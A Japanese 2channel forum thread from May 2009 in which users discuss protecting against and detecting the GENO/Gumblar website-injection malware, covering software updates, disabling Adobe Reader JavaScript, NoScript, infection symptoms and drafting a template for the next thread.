ルータ、アンチウイルス、PFWなどを入れて各種の最新のパッチ入れたほうが楽だろな
俺はWindows7に期待している
879:名無しさん@お腹いっぱい。
09/05/15 11:54:39
スレの伸び方が怖いお。
ノートンとかが対応しないのは横柄?
それとも、まだ全然脅威でない、ってな見解?
880:名無しさん@お腹いっぱい。
09/05/15 11:55:54
VISTAはユーザーにつかいにくいとフルボッコ状態だったけど
ウイルスからフルボッコされないって皮肉なもんだね
881:名無しさん@お腹いっぱい。
09/05/15 11:57:48
まあ、それだけシェアが少なくて相手にすらされてない現状なんじゃね?
シェアがVISTA系のみならUAC回避の方向で作られただろうしさ。
882:名無しさん@お腹いっぱい。
09/05/15 11:58:38
>>880
Macと同じだろ。
不人気だからウィルス作者にも相手にされない。
もしVistaのシェアが激増すれば攻撃されまくるだろうけどね。
Vistaは表面上、セキュリティ厳重に見えちゃうから、
もし攻撃対象になったら素人どもが阿鼻叫喚だと思う。
883:名無しさん@お腹いっぱい。
09/05/15 12:03:34
XP Pro SP2 Firefox3.0.10 です
WindowsUpdate
PDFリーダーを最新にする
AdobeFlashを最新にする
ウイルスバスター2008
NoScript
これだけじゃ防げないの?
884:名無しさん@お腹いっぱい。
09/05/15 12:03:35
OSは最新を使っていればセキュリティはまちがいないな
885:名無しさん@お腹いっぱい。
09/05/15 12:10:01
>>883
当面はだいじょうぶだろうけど油断禁物
886:名無しさん@お腹いっぱい。
09/05/15 12:10:11
>>883
OSに関してはMicrosoftUpdateのほうでおねがいします
なんでSP2なのかわからんけどSP3を当ててね
887:名無しさん@お腹いっぱい。
09/05/15 12:10:32
>>883
とりあえず今のところは防げるんじゃないの
しかし、優秀なGENOウイルスメンバーは、
セキュリティの盲点を新たに突いてやってくるから恐いんだよ
888:名無しさん@お腹いっぱい。
09/05/15 12:11:34
>>859
それだけじゃセーフとはいえない
>>879
横柄とかそんなアホな問題じゃなくて
中身が変わりすぎて対応しきれないだけ
889:883
09/05/15 12:16:00
>>885-887
ありがとう、油断はできないんだねw
>OSに関してはMicrosoftUpdate
WindowsUpdateとなんか違うんですか?
>なんでSP2なのかわからんけど
SP3入れて不具合っての良く見かけたもんで躊躇してますw
890:名無しさん@お腹いっぱい。
09/05/15 12:17:22
w
891:名無しさん@お腹いっぱい。
09/05/15 12:22:58
URLリンク(www3.atword.jp)
↑サイトを見てルータでIPフィルタリングしたいんだけど、送信/受信両方とも登録しなきゃだめかな
892:名無しさん@お腹いっぱい。
09/05/15 12:26:21
>>889
SP3に関して、今はあら捜しが好きな奴が大々的に言ってるだけ。
まあ、SP2出たばっかりの頃を経験してるから、アップデート躊躇する気持ちもわかるけどね。
893:名無しさん@お腹いっぱい。
09/05/15 12:40:41
PayPalのお金がなくなってた!
こいつのせい!?
894:名無しさん@お腹いっぱい。
09/05/15 12:41:15
>>891
送信だけでいいと思うよ
895:名無しさん@お腹いっぱい。
09/05/15 12:42:49
>>893
俺も戸棚に置いといた茶菓子が無くなってた!
こいつのせいに違いない!
896:名無しさん@お腹いっぱい。
09/05/15 12:44:14
>>891
某メーカーのルータはフィルタリングしても効いてないやつあるから注意な
897:名無しさん@お腹いっぱい。
09/05/15 12:45:00
メインはfirefoxでIEはめったに使わないんだけど
IE6のままだと心配?7か8にしたほうがいいのかな?
898:名無しさん@お腹いっぱい。
09/05/15 12:45:09
>>895
おい!
さっきまで腹減ってたのになんだか腹一杯になってるぞ!
お前のせいか!
899:名無しさん@お腹いっぱい。
09/05/15 12:46:51
>>897
IEは他のウイルスにも狙われてるから危険
900:名無しさん@お腹いっぱい。
09/05/15 12:48:19
>>897
せめて7にしとけばいいんでない?
8は入れたけど7に戻したわ。
>>899
>>897はupdateとかでたまに使う程度だと思う
901:名無しさん@お腹いっぱい。
09/05/15 12:52:02
>>900
やっぱりIE6じゃまずいか・・・7入れてみるよ
updateとかでたまに使う程度だけど
902:名無しさん@お腹いっぱい。
09/05/15 12:53:28
>>901
firefoxにieのプラグインを入れたらいい
903:名無しさん@お腹いっぱい。
09/05/15 12:56:00
もし個人HPとか作成していたらそれもやばいのか
904:名無しさん@お腹いっぱい。
09/05/15 12:57:43
>>903
そりゃヤバイだろ
905:名無しさん@お腹いっぱい。
09/05/15 12:58:22
>>902
結局それieエンジンになるから同じことじゃね?
906:名無しさん@お腹いっぱい。
09/05/15 12:58:30
大手企業さえああいうことになってる訳だし~
907:名無しさん@お腹いっぱい。
09/05/15 12:59:00
ちょっとまてよ…
firefoxにieのレタリングをアドオンをすれば
限りなくieの脆弱性をもつfirefoxになるのか?どうだろ
908:名無しさん@お腹いっぱい。
09/05/15 13:02:51
>>902
アホや、アホがおる
909:名無しさん@お腹いっぱい。
09/05/15 13:04:05
アドオン入れてたかもしれん
削除しとこー
910:名無しさん@お腹いっぱい。
09/05/15 13:04:32
>>902
それが一番危ないんだよwww
911:名無しさん@お腹いっぱい。
09/05/15 13:04:58
IEかどうかを調べているから純正IEよりはマシじゃね
912:名無しさん@お腹いっぱい。
09/05/15 13:05:02
>>908
スマンorz
913:名無しさん@お腹いっぱい。
09/05/15 13:05:20
本プラグインの現バージョンでは、IEエンジン使用時にSSLを使用したサイトを鍵マークなどで
区別する手段が用意されておらず、IEエンジンのまま普段訪問しないサイトを利用するのは
セキュリティ上の不安がある。
そのため現状では、“Gecko”エンジンを主に使い、よく利用するが「Firefox」などに対応していない
サイトを利用する際にIEエンジンに切り替える、といった使い方にとどめておくことをお勧めする。
URLリンク(www.forest.impress.co.jp)
914:名無しさん@お腹いっぱい。
09/05/15 13:06:42
>>907
なりません
915:名無しさん@お腹いっぱい。
09/05/15 13:07:06
もうね危ないからネットのケーブルはずしちゃお。
これで気兼ね無くネットができ……アレ?
916:名無しさん@お腹いっぱい。
09/05/15 13:07:58
深刻なはずなのに、たまに和むレスがあるなwww
917:名無しさん@お腹いっぱい。
09/05/15 13:09:44
URLリンク(dxd8.com)
ホームページ制作会社が感染というは危険がありますか?
発注先の会社が感染しているか確認する方法はありませんか?
918:名無しさん@お腹いっぱい。
09/05/15 13:10:31
ソースみりゃ
919:名無しさん@お腹いっぱい。
09/05/15 13:10:53
>>917
www
あるわけないだろw
直接聞いてみたら?
920:名無しさん@お腹いっぱい。
09/05/15 13:13:48
>>917
まじかよ。
危険もなにもやばすぎるだろ…。
ウイルス入りのページばらまかれたらたまらないな。
制作会社のソースを確認したほうがいいぞ。
921:名無しさん@お腹いっぱい。
09/05/15 13:14:31
ありがぞうございます
ソースというのはどこで見ればいいのでしょうか?
922:名無しさん@お腹いっぱい。
09/05/15 13:15:26
>>921
冷蔵庫に入ってるんじゃね
923:名無しさん@お腹いっぱい。
09/05/15 13:17:30
>>889
SP2へのアップデート時にはかなりの変更があったのでトラブルが続出したけど
SP3は基本的にセキュリティ修正なのでだいたい問題ないはず
WindowsUpdateはOSのみ。MicrosoftUpdateはOS、Office他。
Office入ってなくてもWindowsUpdateじゃ更新されないものがあるんで
こちらを推奨だそうです。
URLリンク(www.microsoft.com)
924:名無しさん@お腹いっぱい。
09/05/15 13:17:52
www
マジレスすると今すぐ電話して聞け
925:名無しさん@お腹いっぱい。
09/05/15 13:18:50
JAVA切っちゃってみんな絶対動画サイト見ないの?
俺は我慢できんからつべとニコ許可しちまった
926:名無しさん@お腹いっぱい。
09/05/15 13:20:00
>>925
JavaじゃなくてJavaScriptのほうね
927:名無しさん@お腹いっぱい。
09/05/15 13:21:55
>>923
ありがとう、Office入ってないけど考えてみます
928:名無しさん@お腹いっぱい。
09/05/15 13:22:21
ここにどう動作してるのか詳細に説明してあるな。
URLリンク(ilion.blog47.fc2.com)
このタイプはVISTA系以外でIE系なのか調べて該当したら、
Adobeの脆弱性を利用して感染している様だ。
次はどんな亜種が出てくるのやら
929:名無しさん@お腹いっぱい。
09/05/15 13:22:43
制作会社感染はまずすぎますね
定期age
はじめてきた人はここで確認してください
URLリンク(www3.atword.jp)
930:名無しさん@お腹いっぱい。
09/05/15 13:23:48
>>925
同じくw
加えてyahooとgoogleも許可してるけどまずいのか?
931:名無しさん@お腹いっぱい。
09/05/15 13:24:57
JavaScriptは切ってないな
リーダーの方をアンインストした
又インストすれば良いし
932:名無しさん@お腹いっぱい。
09/05/15 13:26:01
感染するとどんな挙動になるんです?
933:名無しさん@お腹いっぱい。
09/05/15 13:26:35
>>928
IEだとめちゃ危険じゃん…。
934:名無しさん@お腹いっぱい。
09/05/15 13:28:41
>>932
ある日突然パスワードが盗まれます
935:名無しさん@お腹いっぱい。
09/05/15 13:31:20
もうやだ…検索するのさえ怖い
936:名無しさん@お腹いっぱい。
09/05/15 13:32:59
URLリンク(www3.atword.jp)
ここのListをPG2や葱用にBlock.txt作ったけど要る?
937:名無しさん@お腹いっぱい。
09/05/15 13:34:29
類をみない凶悪さだ思うんだが、思ったより騒がれていないな。
もっと取り上げられてもいいはず。
IE系で無自覚で感染しているやつが多そうで怖いよ。
938:名無しさん@お腹いっぱい。
09/05/15 13:35:10
>>936
くらはい
939:名無しさん@お腹いっぱい。
09/05/15 13:35:12
大体解決したね
もう次スレいらないね
940:名無しさん@お腹いっぱい。
09/05/15 13:35:54
久しぶりに見たわそれ
941:名無しさん@お腹いっぱい。
09/05/15 13:36:50
次スレそろそろ立てるシーズンだけど
テンプレ考えようか
942:名無しさん@お腹いっぱい。
09/05/15 13:36:51
>>937
大きくニュースで取り上げられたら普通の人も怖さに気付く
943:名無しさん@お腹いっぱい。
09/05/15 13:37:12
パスワード盗まれるだけで
PCに挙動がおかしくなったりしないの?
PC異常きたさずにパスだけ抜かれるなら
怖いな
944:名無しさん@お腹いっぱい。
09/05/15 13:37:17
解決してねーだろw
ここのやつらは解決してるだろうが。
945:名無しさん@お腹いっぱい。
09/05/15 13:37:55
>>928
IEじゃなくても危険ということか…
946:名無しさん@お腹いっぱい。
09/05/15 13:39:08
>>945
どこをどう読んだらそうなる?
IE系がターゲットにされてるんだよ
IE以外も油断はできない早さで進化してるけどな
947:名無しさん@お腹いっぱい。
09/05/15 13:42:12
挙動おかしくなるて書いてたよ
948:名無しさん@お腹いっぱい。
09/05/15 13:43:29
>>946
928を書いた人か?
949:名無しさん@お腹いっぱい。
09/05/15 13:43:42
もうイヤだ。
こんなインターネッツ。
950:名無しさん@お腹いっぱい。
09/05/15 13:44:29
>>948
違うよw
951:名無しさん@お腹いっぱい。
09/05/15 13:45:03
再起動でけた
小林製薬のHP見たことあるからびびってたんですよ
952:名無しさん@お腹いっぱい。
09/05/15 13:45:45
ふっつーにOperaでも感染しそうになったよ
Adobe ReaderのJavaScriptを切っていたから助かったみたいだけど
もちろんUA偽装なんかしてないぞ
953:名無しさん@お腹いっぱい。
09/05/15 13:46:21
>>943
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
これ天婦羅に揚げた方がいいんじゃないか?
954:名無しさん@お腹いっぱい。
09/05/15 13:46:42
また新種きてるってこと?
そろそろ次スレ準備お願いします。
955:名無しさん@お腹いっぱい。
09/05/15 13:47:11
>>941
感染を疑った人の報告をテンプレで統一化するのは?
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
こんな感じにすれば診断する側も
見やすい気がするお
956:名無しさん@お腹いっぱい。
09/05/15 13:47:14
【解決】GENOウイルススレ 4【してません】
957:名無しさん@お腹いっぱい。
09/05/15 13:47:40
>>953
これとあテンプレ候補よろ~
立ててくるから
958:名無しさん@お腹いっぱい。
09/05/15 13:48:24
とりあえずそんなもんかな?
よろしくー。
一般人が騒ぎ出す頃が一番やばそうだね。
959:936
09/05/15 13:49:06
>>938
URLリンク(www.rupan.net)
960:名無しさん@お腹いっぱい。
09/05/15 13:49:38
テンプレとしてこれに追加で良いかな
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
URLリンク(anubis.iseclab.org)
★過去スレ
GENOウイルススレ ★3
スレリンク(sec板)
GENOウイルススレ ★2
スレリンク(sec板)
GENOウイルススレ
スレリンク(sec板)
961:名無しさん@お腹いっぱい。
09/05/15 13:50:29
>>5 のサイトもいれてほしい
962:名無しさん@お腹いっぱい。
09/05/15 13:52:02
>>959
ありがと
これも追加してもらってもいいかな?
963:名無しさん@お腹いっぱい。
09/05/15 13:52:49
製薬会社のメールマガジン登録してるんだけど
これも開いたら危ないのかな…
964:名無しさん@お腹いっぱい。
09/05/15 13:53:41
とりあえず残りのレスはテンプレに入れてほしいものを書き出そう
965:名無しさん@お腹いっぱい。
09/05/15 13:54:24
>>5
>>19
966:名無しさん@お腹いっぱい。
09/05/15 13:55:10
次スレです。
追加のテンプレを考えてください。
随時追加します。
GENOウイルススレ ★4
スレリンク(sec板)
967:名無しさん@お腹いっぱい。
09/05/15 13:57:57
おつー
>>19 もたのんます
968:名無しさん@お腹いっぱい。
09/05/15 13:58:10
まず最新バージョンにする
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1(5/12アップデート)
AdobeReader設定で、
「PDFをブラウザに表示」「Adobe Javascripを使用」
っていうところのチェックボックスを外す
ほとんどのAdobeReaderプラグインの脆弱性を狙ったウイルスにやられなくなる
--
これはいれたほうがいいかな?
969:名無しさん@お腹いっぱい。
09/05/15 13:59:08
・IEを使用しない
・FirefoxならNoScriptを入れる
これも最初に入れてくれ
970:名無しさん@お腹いっぱい。
09/05/15 14:02:07
テンプレに、So-netの記事と小林製薬他の「まともな告知をしている所」のリンク張っといたら?
説明するのに楽だろ。
971:名無しさん@お腹いっぱい。
09/05/15 14:02:08
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
972:名無しさん@お腹いっぱい。
09/05/15 14:03:14
【OS】 Windows Me
【使用セキュリティソフト】 avast! 4.8 Home Edition
【疑った理由】 106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため
【症状】 avastが反応し、警告音と共に「JS:Redirector-H2(トロイの木馬)を検出した」と表示されたので、
驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明
【確認手段】 「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック後、再起動
【結果】 ウイルスの検出無し、再起動は正常、CPU使用率も正常、MS-DOSプロンプト、regedit起動可能
973:名無しさん@お腹いっぱい。
09/05/15 14:03:47
1.Adobe Flash Player のアップデート
2.Adobe Acrobat Reader のアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript OFF
5.危険IPのブロック
974:名無しさん@お腹いっぱい。
09/05/15 14:06:49
ネットがリアルに浸入してきたんだ!
975:名無しさん@お腹いっぱい。
09/05/15 14:06:51
>>XP / 2000 の方は sqlsodbc.chm をチェックしてください。
この sqlsodbc.chm ってVISTAにもあるがスルーでいいのか?
格納されてる場所は違うけども
976:名無しさん@お腹いっぱい。
09/05/15 14:07:41
テンプレ完成したらまとめwikiに貼っておこうよ
次スレまでに状況変わるにしても叩き台にはなるし
977:名無しさん@お腹いっぱい。
09/05/15 14:10:12
>>972
お前はもう黙ってろw
978:名無しさん@お腹いっぱい。
09/05/15 14:11:41
おつー
ひととりOKかな?
Meの人はあきらめてくださいw
979:名無しさん@お腹いっぱい。
09/05/15 14:11:42
一応大体のものは貼ってきた
被った人すみません。>>966
980:名無しさん@お腹いっぱい。
09/05/15 14:14:06
まとめサイト>>129
981:名無しさん@お腹いっぱい。
09/05/15 14:16:09
>>970
これで良いかな?
スレリンク(sec板:12番)
982:名無しさん@お腹いっぱい。
09/05/15 14:16:59
>>199関連も必要なのかな
983:名無しさん@お腹いっぱい。
09/05/15 14:17:44
>>980
すまん入れていなかったので今テンプレ続きにした
984:名無しさん@お腹いっぱい。
09/05/15 14:21:33
プリフェッチ機能を無効
でググったらIEもできるみたいだけど、やったほうがいいんかね
985:名無しさん@お腹いっぱい。
09/05/15 14:22:07
落ち着いたみたいなので質問
感染した場合、ワクチンやM$のパッチじゃ回復できないの?
986:名無しさん@お腹いっぱい。
09/05/15 14:24:02
>>985
感染してたら、今のところ
クリーンインストール&各種PASS変更 推奨
987:名無しさん@お腹いっぱい。
09/05/15 14:24:51
>>986
ありがとう
やっぱりそうか…やばいね
988:名無しさん@お腹いっぱい。
09/05/15 14:26:11
gumblar.cn の検索結果 約 84,200 件中 1 - 10 件目 (0.10 秒)
989:名無しさん@お腹いっぱい。
09/05/15 14:26:24
>>968
javaは見つかったが
「PDFをブラウザに表示」の項目がどこかわからない
990:名無しさん@お腹いっぱい。
09/05/15 14:27:29
>>989
確かインターネットの下。
俺はreaderいれてないから確認できないすまん
991:名無しさん@お腹いっぱい。
09/05/15 14:28:07
>>986
感染しているかどうかは、どうやって判定すれば良いの?
992:名無しさん@お腹いっぱい。
09/05/15 14:28:34
環境設定→インターネット→Webブラウザオプション
993:名無しさん@お腹いっぱい。
09/05/15 14:28:40
>>991
スレリンク(sec板:12番)
994:名無しさん@お腹いっぱい。
09/05/15 14:30:34
検出してくれるセキュリティソフトも追加しないか?
付け焼き刃だけど
・Avast!
・Kaspersky
995:名無しさん@お腹いっぱい。
09/05/15 14:33:47
>>994
こんな感じでいいのかな?
現時点で確認出来る対策ソフト
・Avast!
・Kaspersky
996:名無しさん@お腹いっぱい。
09/05/15 14:33:55
・ウイルスバスター2009
もかな
ソースネクストとかのはやばそうだなw
997:名無しさん@お腹いっぱい。
09/05/15 14:34:40
>>991
sqlsodbc.chmのファイルサイズとMD5をチェック
998:名無しさん@お腹いっぱい。
09/05/15 14:34:44
どんどん亜種が出てるみたいから対策ソフトも追いついてない
999:名無しさん@お腹いっぱい。
09/05/15 14:35:21
>>995
※亜種の進化が速いため過信は禁物
とか書いたほうがいいかも